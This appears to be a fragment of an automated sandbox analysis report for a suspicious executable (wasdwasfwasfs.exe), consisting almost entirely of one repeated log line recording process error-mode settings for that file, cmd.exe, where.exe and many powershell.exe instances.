                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\where.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\where.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
